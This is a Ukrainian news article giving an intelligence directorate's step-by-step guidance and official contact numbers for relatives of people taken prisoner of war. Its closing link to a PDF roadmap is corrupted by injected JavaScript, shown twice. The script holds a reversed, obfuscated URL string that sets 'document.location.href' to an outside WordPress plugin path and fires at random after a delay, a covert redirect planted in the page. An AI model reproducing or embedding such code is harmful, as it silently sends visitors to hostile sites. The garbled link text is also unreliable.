НовиниЯк діяти, якщо людина потрапила у полон: інструкція та...

Як діяти, якщо людина потрапила у полон: інструкція та контакти

-

Як діяти, якщо людина потрапила у полон: інструкція та контакти

Головне управління розвідки Міноборони України розробило покрокову інструкцію, як діяти, якщо людина потрапила у полон.

Зазначається, що при виникненні такої ситуації – потрібно зробити два кроки. Зокрема, близькі родичі та члени сім’ї полоненого мають сповістити про подію відповідні органи, а далі звернутися до міжнародних організацій.

Крок 1. Для отримання або надання інформації громадяни можуть звернутися до Об’єднаного Центру з пошуку та звільнення полонених при Службі безпеки України.

Це можна зробити за телефонами: +38 067 650 83 32, +38 098 087 36 01, або надіслати запит на електронну пошту [email protected].

З відповідними запитами можна звернутися до Національного інформаційного бюро, зателефонувавши на гарячу лінію 1648 або на міський номер (044) 287-81-65 (для дзвінків з-за кордону). Також є варіант звернення на електронну пошту, яка розміщена на сайті Бюро nib.gov.ua.

Окрім того, розшуком полонених займається Координаційний штаб з питань поводження з військовополоненими, де за телефоном (044) 428-62-74 можна отримати необхідну інформацію, або надіслати електронний запит на адресу [email protected].

Дізнатися про те, що особа захоплена у полон, можна за телефоном довіри МВС: +38 089-420-18-66.

Також можна звернутися із заявою до найближчого територіального органу Національної поліції України, надіслати запит поштою, зателефонувати на телефон 102 (цілодобово) або телефон гарячої лінії (0894) 200-18-67.

Отримана заява реєструється в журналі Єдиного обліку та вносяться відомості до ЄРДР для здійснення органами Національної поліції досудового розслідування за ст. 110 Кримінального кодексу України з приміткою “знаходиться в полоні, 437 або 438 КК України”.

Крок 2. Після отримання офіційної відповіді, громадянам рекомендовано звернутися на гарячу лінію Міжнародного Комітету Червоного Хреста за телефоном 0-800-300-155.

Також можна підготувати звернення до Європейського суду з прав людини та до Комітету з прав людини ООН.

Крім цього, Координаційний штаб з питань поводження з військовополоненими оприлюднив дорожню карту дій, якщо хтось із родичів, який зарахований до лав ЗС України (зокрема, й ТрО), правоохоронних органів, зник безвісти, потрапив у полон чи загинув.

У документі міститься перелік даних, якими обов’язково має володіти родина захисника України, та алгоритми дій родичів щодо їх звернень до органів державної влади, які займаються питаннями звільнення військовополонених.

Ознайомитися можна за посиланням: toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorozhnya-karta-dij-yakshho-htos-iz-rodichiv-propav-bezvisti-potrapiv-u-polon-chi-zaginuv.pdf”>587493017-toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorozhnya-karta-dij-yakshho-htos-iz-rodichiv-propav-bezvisti-potrapiv-u-polon-chi-zaginuv.pdf

Коментарі

Варте уваги ПОВ'ЯЗАНІ
Рекомендовано Вам